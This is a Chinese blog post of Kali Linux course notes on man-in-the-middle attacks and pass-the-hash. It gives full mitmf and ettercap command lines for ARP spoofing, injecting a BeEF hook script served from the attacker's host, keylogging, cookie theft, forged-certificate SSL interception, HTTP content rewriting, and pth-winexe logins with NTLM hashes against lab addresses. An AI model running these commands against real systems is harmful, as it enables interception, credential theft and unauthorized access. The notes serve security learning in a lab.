Kali Linux渗透测试 108 中间人攻击

最新推荐文章于 2024-07-31 17:32:19 发布
最新推荐文章于 2024-07-31 17:32:19 发布
阅读量5.6k 收藏 21
点赞数 6
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79829721
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 中间人攻击

1. mitmf

  1. 简介

    • 即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码
    • 一旦得手,影响范围巨大
    • 如果中间人发生在运营商线路上,很难引起用户注意

  2. 曾经号称最好用的中间人攻击工具(kali 2.0后默认未安装)

    # 安装环境
root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

# 安装 mitmf
root@kali:~# apt-get install mitmf
root@kali:~# pip uninstall Twisted
root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
root@kali:~# pip install ./Twisted-15.5.0.tar.bz2

  3. 启动beef

    • cd /usr/share/beef-xss/
    • ./beef

  4. mitmf 中间人注入xss脚本

    # 作为中间人连接网页并插入 js
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --inject --js-url http://10.10.10.131:3000/hook.js


  5. 键盘记录器

    # 键盘记录器 --jskeylogger
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --jskeylogger

  6. 其他模块

    # 图片:--upsidedownternet、--screen(/var/log/mitmf)
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --upsidedownterne
# cookie:--ferretng(cookie)
root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --ferretng
# 浏览器及插件信息: --browserprofiler
# smb:--smbtrap、--smbauth(不演示)

  7. 旁路 –hsts

    • HTTP Strict Transport Security
    • 防止协议降级、cookie窃取
    • 安全策略通过HTTP响应头 “Strict-Transport-Security“实施
    • 限制 user-agent、https 等

  8. 凌空插后门 –filepwn

    • 用户下载的可执行程序在经过代理的时候,会被插入后门

2. ettercap

  1. 简介

    • 统一的中间人攻击工具
    • 转发 MAC 与本机相同,但 IP 与本机不同的数据包
    • 支持 SSH1、SSL 中间人攻击

  2. 模块划分

    • Snifer
      • 负责数据包转发
      • Unified
        • 单网卡情况下独立完成三层包转发
        • 始终禁用内核 ip_forward 功能
      • Bridge
        • 双网卡情况下的一层 MITM 模式
        • 可作为 IPS 过滤数据包
        • 不可在网关上使用(透明网桥)

    • MITM

      • 把流量重定向到 ettercap 主机上
      • 可以使用其他工具实现 MITM,ettercap 只作嗅探和过滤使用
      • 实现MITM的方法
        • ARP
        • ICMP
          • ICMP路由重定向,半双工
        • DHCP
          • 修改网关地址,半双工
        • Switch Port Stealing
          • flood目标地址是本机,源地址是受害者的包
          • 适用于ARP静态绑定的环境
        • NDP
          • IPv6协议欺骗技术

    • Filter

    • Log
    • Plugin

  3. 特性

    • 2.4以上内核对ARP地址欺骗的约束
      • 收到非请求的 ARP 响应包,不更新本地 ARP 缓存
      • Ettercap 使用ARP request 包进行攻击
    • Solaris 不根据ARP包更新本地ARP缓存
      • Ettercap 使用先发 ICMP 包来更新 ARP 缓存

  4. 用户操作界面

    • -T 文本界面图形
    • -G 界面
    • -C 基于文本的图形界面
    • -D 后台模式

  5. 指定目标

    • IPv4:MAC/IPs/Ports
    • IPv6:MAC/IPs/IPv6/Ports
    • /10.0.0.1−5;10.0.1.33/20−25,80,110

  6. 权限

    • 需要root权限打开链路层Socket连接,然后使用nobody账号运行
    • 日志写入目录需要nobody有写入权
    • 修改etter.conf:EC_UID=65534

  7. 基于伪造证书的SSL MITIM

    • Bridge模式不支持SSL MITM
    • openssl genrsa −out etter.ssl.crt 1024
    • openssl req −new−keyetter.ssl.crt −out tmp.csr
    • openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt−out tmp.new
    • cat tmp.new>>etter.ssl.crt
    • rm −f tmp.newtmp.csr

  8. ARP 中间人攻击

    • 字符模式(arp 欺骗)
      • ettercap -i eth0 -T -M arp -q /10.10.10.2// /10.10.10.133// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
    • 图形界面

    • SSL MITM
      # 启用基于 SSL 的中间人攻击
      vim /etc/ettercap/etter.conf

    • DNS欺骗

      • dns_spoof插件配置文件
      • vi /etc/ettercap/etter.dns

  9. Ettercap 日志查看

    • etterlog -p log.eci
    • etterlog -c log.ecp
    • etterlog -c -f /1.1.1.1/ log.ecp
    • etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件

  10. Filter

    • /usr/share/ettercap/
    • /usr/share/ettercap/etter.filter.ssh

  11. SSH-2.xx / SSH-1.99 / SSH-1.51

    • SSH-1.99 代表兼容 ssh-2 和ssh1,可以使用 Filter 来只使用 ssh-1,利于监听
    • etterfilter etter.filter.ssh -o ssh.ef

  12. 替换HTTP内容

    if (ip.proto == TCP && tcp.src == 80)
    { msg(“data on TCP 80\n”);
    replace(“img src=”, “img src=\”http://1.1.1.1/1.gif\” “);
    replace(“IMG src=”, “img src=\”http://1.1.1.1/1.gif\” “);
    replace(“IMG SRC=”, “img src=\”http://1.1.1.1/1.gif\” “);
    }

  13. 其他欺骗

    • ICMP
      • -M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)
    • DHCP
      • −M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)
    • Port
      • -M port /1.1.1.1/ /1.1.1.2/
    • Ndp
      • -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/
      • -

2. Pass the Hash (PTH)

  1. 简介

    • 密码破解耗费时间资源巨大
    • 使用密文提交给服务器直接完成身份认证
    • NTLM/LM是没有加盐的静态HASH密文
    • 企业中使用ghost等工具克隆安装系统
    • pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd

  2. 获取 win7 HASH 值

    • 使用 kali live iso 登录win7

    • nc 传输

      kali:nc -nvlp 333
win7:nc 10.10.10.131 333
结果:John:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

  3. kali 使用 密文直接登录

    root@kali:~# pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //10.10.10.133 cmd
网络安全打工人
关注
专栏目录
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 4062
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
Kali安全渗透高级工程师》中间人攻击渗透测试
君逍遥o
05-10 96
Kali安全渗透高级工程师》中间人攻击渗透测试
Kali Linux渗透测试(安全牛).txt
04-17
├─第1章 课程介绍 │ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:Kali Linux安装-熟悉环境.mp4 │ ├─第3章 工作环境优化 │ 任务005:网络配置、更新升级、安装软件包、浏览器插件.mp4 │ 任务006:安装Java、安装显卡驱动、安装网卡补丁、并发线程限制、电源优化.mp4 │ 任务007:.mp4 │ 任务008:.mp4 │ ├─第4章 实验环境 │ 任务009:实验环境.mp4 │ ├─章 基本工具 │ 任务010:基本工具-NETCAT(telnet-banner、传输文本信息).mp4 │ 任务011:基本工具-NETCAT(传输-目录、流媒体服务、端口扫描、远程克隆硬盘).mp4 │ 任务012:基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议.mp4 │ 任务013:基本工具-常见协议包、WIRESHARK-TCP.mp4 │ 任务014:WIRESHARK-信息统计、实践.mp4 │ 任务015:TCPDUMP-抓包、筛选、高级筛选、过程文档记录.mp4 │ ├─章 信息收集 │ 任务016:被动信息收集:信息收集内容、信息用途、信息收集DNS、DNS信息收集-NSLOOKUP.mp4 │ 任务017:DNS信息收集-DIGmp4.mp4 │ 任务018:DNS区域传输、DNS字典爆破、DNS信息.mp4 │ 任务019:搜索引擎、SHODAN.mp4 │ 任务020:SHODAN.mp4 │ 任务021:google搜索:实例.mp4 │ 任务022:其他途径.mp4 │ 任务023:RECON-NG.mp4 │ ├─章 主动信息收集 │ 任务024:主动信息收集-发现.mp4 │ 任务025:主动信息收集-发现(二).mp4 │ 任务026:主动信息收集-发现(三).mp4 │ 任务027:主动信息收集-发现(四).mp4 │ 任务028:主动信息收集-发现(五).mp4 │ 任务029:端口扫描.mp4 │ 任务030:端口扫描(二).mp4 │ 任务031:服务扫描.mp4 │ 任务032:操作系统识别.mp4 │ 任务033:SMB扫描.mp4 │ 任务034:SMTP扫描.mp4 │ ├─章 弱点扫描 │ 任务035:弱点扫描.mp4 │ 任务036:NMAP.mp4 │ 任务037:NESSUS.mp4 │ 任务038:NEXPOSE.mp4 │ ├─章 缓冲区溢出 │ 任务039:缓冲区溢出.mp4 │ 任务040:POP3.mp4 │ 任务041:FUZZING.mp4 │ 任务042:Linux缓冲区溢出.mp4 │ 任务043:选择和修改EXP.mp4 | ├─章 提权 │ 任务45: 抓包嗅探.mp4 │ 任务46: WCE.mp4 │ 任务47: 利用漏洞提权.mp │ 任务48: 利用配置不当提权.mp4 │ 任务49: 收集敏感数据、隐藏痕迹.mp4 │ ├─章 无线 │ 任务050:无线渗透.mp4 │ 任务051:无线网运行模式和无线网硬件设备及基本概念.mp4 │ 任务052:无线技术概念.mp4 │ 任务053:Linux 无线协议栈及配置命令.mp4 │ 任务054:RADIOTAP头部.mp4 │ 任务055:CONTROL FRAME.mp4 │ 任务056:MANAGEMENT FRAME 管理帧.mp4 │ 任务057:REASSOCIATION REQUEST FRAME.mp4 │ 任务058:WEP加密、RC4算法.mp4 │ 任务059:WPA安全系统.mp4 │ 任务060:交换、无线渗透实操:AIRCRACK-NG基础、AIRODUMP-NG排错.mp4 │ 任务061:AIREPLAY-NG.mp4 │ 任务062:Mac地址绑定.mp4 │ 任务063:WPA.mp4 │ 任务064:COWPATTY 密码.mp4 │ 任务065:WPS.mp4 │ 任务066:WPS及其他工具.mp4 │ 任务067:EVIL TWIN AP、ROGUE AP.mp4 │ 任务068:AIRRACK-NG SUITE.mp4 │ 任务069:AIRRACK-NG(二).mp4 │ ├─章 补充 │ 任务070:协议分析.mp4 │ ├─第13章 Web渗透 │ 任务071:HTTP协议基础.mp4 │ 任务072:扫描工具-Nikto.mp4 │ 任务073:vega.mp4 │ 任务074:skipfish.mp4 │ 任务075:w3af.mp4 │ 任务076:w3af-身份认证.mp4 │ 任务077:w3af-截断.mp4 │ 任务078:Arachni.mp4 │ 任务079:OWASP_ZAP.mp4 │ 任务080:Burpsuite.mp4 │ 任务081:Burpsuite-intruder.mp4 │ 任务082:Burpsuite-repeater,Sequencer,编码,截断工具.mp4 │ 任务083:ACUNETIX WEB VULNERABILITY SCANNER.mp4 │ 任务084:APPSCAN.mp4 │ 任务085:答疑(Conky、、Linux4.4内核发布),手动漏洞挖掘.mp4 │ 任务086:手动漏洞挖掘(二).mp4 │ 任务087:手动漏洞挖掘(三).mp4 │ 任务088:手动漏洞挖掘(四).mp4 │ 任务089:KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入).mp4 │ 任务090:手动漏洞挖掘-SQL注入.mp4 │ 任务091:手动漏洞挖掘-SQL注入.mp4 │ 任务092:手动漏洞挖掘-SQL盲注.mp4 │ 任务093:SQLMAP- 自动注入.mp4 │ 任务094:SQLMAP自动注入-REQUEST.mp4 │ 任务095:SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION.mp4 │ 任务096:SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT.mp4 │ 任务097:SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、MISCELLANEOUS.mp4 │ 任务098:XSS-简介、跨站脚本检测和常见的利用手段.mp4 │ 任务099:XSS- 键盘记录器和反射型XSS.mp4 │ 任务100:存储型XSS和BEEF浏览器框架.mp4 │ 任务101:CSRF.mp4 │ 任务102:WEBSHELL.mp4 │ 任务103:HTTPS.mp4 │ 任务104:SSL、TLS中间人.mp4 │ 任务105:SSL、TLS拒绝服务和补充概念.mp4 │ ├─第14章 密码 │ 任务106:思路、身份认证方法、密码方法、字典.mp4 │ 任务107:字典、在线密码-hydra.mp4 │ 任务108:在线密码-hydra、在线密码-medusa、离线密码.mp4 │ 任务109:离线密码、离线密码-Hashcat.mp4 │ 任务110:离线密码.mp4 │ 任务111:密码嗅探(第四版剪辑版).mp4 │ 任务112:密码嗅探、中间人.mp4 │ 任务113:中间人、ARP MITM、中间人、Pass the Hash.mp4 │ ├─第15章 流量操控与隧道 │ 任务114:流量操控技术、重定向.mp4 │ 任务115:SSH隧道和SSH本地端口转发.mp4 │ 任务116:SSH远程端口转发和动态端口转发以及X协议转发.mp4 │ 任务117:DNS协议隧道、DNS协议隧道-dns2tcp.mp4 │ 任务118:DNS协议隧道-dns2tcp.mp4 │ 任务119:DNS协议隧道-iodine、NCAT.mp4 │ 任务120:SOCAT.mp4 │ 任务121:ptunnle.mp4 │ 任务122:proxytunnle.mp4 │ 任务123:sslh.mp4 │ 任务124:补充Proxytunnel、stunnel4.mp4 │ ├─第16章 拒绝服务 │ 任务125:拒绝服务介绍、DoS分类、个人DoS分类方法.mp4 │ 任务126:Syn-Flood、IP地址欺骗.mp4 │ 任务127:Smurf、Sockstress.mp4 │ 任务128:TearDrop.mp4 │ 任务129:DNS放大.mp4 │ 任务130:SNMP放大.mp4 │ 任务131:NTP放大.mp4 │ 任务132:应用层Dos.mp4 │ 任务133:拒绝服务工具-RUDY、Hping3、LAND、Siege.mp4 │ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 │ 任务136:当前现状、软件保护,自己编写后门.mp4 │ 任务137:Veil-evasion.mp4 │ 任务138:Veil-catapult.mp4 │ 任务139:Veil-catapult总结、另一种免杀思路、shellter.mp4 │ 任务140:Backdoor-f
Kali Linux渗透测试
Jeremy.Rin的博客
07-07 2413
Kali Linux渗透测试 Kali Linux VirtualBox 虚拟机安装 Kali Linux 持久加密USB安装
Kali Linux渗透测试,这篇就够了!
最新发布
fly_enum的博客
07-31 602
​web渗透测试旨在通过查找目标网站由于技术原因所造成的漏洞,而导致网站使他人攻击。测试的本质是找出漏洞并提交他人修复。本文可能存在各种攻击手段和攻击方法
kali linux 渗透测试介绍
Sumarua的博客
10-20 556
安全问题的根源 优点:分工明确,工作效率高。 缺点:从业人员对系统没有整体的认识,对安全认识较为片面。 最大威胁是人,人都会犯错,安全问题不能100%绝对根除。 安全目标 先于攻击者发现和防止漏洞出现 攻击型:以攻击者的思维发现漏洞、攻击系统。 防护型:投入巨大,会有遗漏,不够全面,收效不高。 渗透测试 尝试破解系统防御机制,发现系统弱点 从攻击者的角度思考,测量安全防护的有效性 证明问题存在,而...
KaliLinux渗透测试-章1
hhhhgj的博客
07-22 177
Kali的安装-跳过 Kali的好处 1.Kali是基于Linux的Debian系统的发行版,操作和蔼。2.Kali内置多个渗透测试软件包,例如:nmap 、Wireshark 、John the Ripper等。这也是大家选择Kali的原因。## Kali的入门 在安装好Kali之后,某些人(我)在 Kali Linux2020中貌似无法进入root账户,只能以初次设置的账户进入。 问题解决:以设置的普通账户进入,然后打开终端, 执行sudo passwd root后输入两次新密码即可修改root密
基于Android设备的Kali Linux渗透测试教程1
06-13
本文档是一份关于在Android设备上实施Kali Linux渗透测试的教程。Kali Linux是一种专为安全专业人员设计的操作系统,用于渗透测试、计算机取证等安全相关任务。本教程的核心内容包括在Android设备上安装和配置Kali ...
Kali Linux 无线渗透测试入门指南 中文版
11-21
Kali Linux 无线渗透测试入门指南》是一本专为初学者设计的中文教程,旨在帮助读者理解并掌握使用Kali Linux进行无线网络渗透测试的基本技能。Kali Linux是一款广泛应用于安全审计和渗透测试的开源操作系统,其...
Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书
程序员白楠楠的博客
10-08 3056
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能学习并掌握渗透测试方法和工具。 《Kali Linux高级渗透测试原书第2版》 目录: 1章 基于目标的渗透测试 1 1.1 安全测试的概念 1 1.2 经典漏洞扫描、渗透测试和红队练习的失败 2 1.3 测试方法 2 1.4 Kali Linux介绍——历史和目的 4 1.5 安...
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头开始了解Kali Linux。按照官方网站 的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发 行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。
Kali Linux渗透测试小实践——DNS欺骗
PICACHU+++的博客
12-17 3825
DNS欺骗也称为DNS劫持或重定向,是一种DNS攻击,其中DNS查询被错误地解析,从而意外地将用户重定向到恶意站点。为了进行攻击,犯罪者要么在用户计算机上安装恶意软件,接管路由器,要么拦截或破坏DNS通信。DNS劫持可用于欺骗在这种情况下,攻击者通常显示不需要的广告以产生收入;或用于网络钓鱼,显示用户访问的虚假网站版本并窃取数据或凭据。
Kali Linux渗透测试实战 1.2
Conan
06-23 1958
1.2 环境安装及初始化   目录(?)[-]   环境安装及初始化 下载映像安装虚拟机安装Kali Linux安装中文输入法安装VirtualBox增强工具配置共享目录和剪贴板运行 Metasploit Framework 启动Kali的PostgreSQL服务启动Kali的Metasploit服务在Kali运行msfconsole 小结   在1.1节,我们大
KaliLinux】————1、KaliLinux渗透测试环境搭建(MATE版本)
Fly_鹏程万里
08-12 1205
前言 本系列文章将全面贯彻KaliLinux渗透测试中的使用包括基本环境的搭建、安全工具的安装以及使用等内容。 KaliLinux Kali Linux是基于Debian的黑客攻击和渗透测试分发的第一大最佳操作系统。由进攻性安全部门开发。第一个版本发布于2006年2月5日,它完成了BackTrack Linux项目。它曾经使用GNOME作为桌面环境。如今,Kali Linux成为Rol...
kalilinux 渗透测试笔记
weixin_33694172的博客
05-18 687
声明:本文理论大部分是苑房弘kalilinux渗透测试的内容 第五章:基本工具 克隆网页,把gitbook的书记下载到本地 httrack "http://www.mybatis.org/mybatis-3/zh/" -O ./books/mybatis/ -v 第六章: 信息收集 shodan 官网:https://www.shodan.io/ 视频教程:https://asciine...
Kali Linux渗透测试——默认安装引发的漏洞
橘子女侠
06-27 640
默认安装引发的漏洞 即自动扫描后,如何对发现的漏洞告警进行进一步的验证。 实验环境 攻击机:Kali IP地址:192.168.37.138 靶机:Metasploitable2 IP地址:192.168.37.135 默认安装 1. Windows默认安装漏洞 流传linux操作系统比windows系统安全,是因为windows系统默认安装后,会开放很多...
从实践中学习Kali Linux渗透测试
热门推荐
qq_54480761的博客
01-15 2万+
目录 第一章 渗透测试概述 第二章 安装Kali Linux系统 第三章 配置Kali Linux 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏
Kali Linux渗透测试技术详解_渗透测试入门
m0_61869253的博客
06-02 2016
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值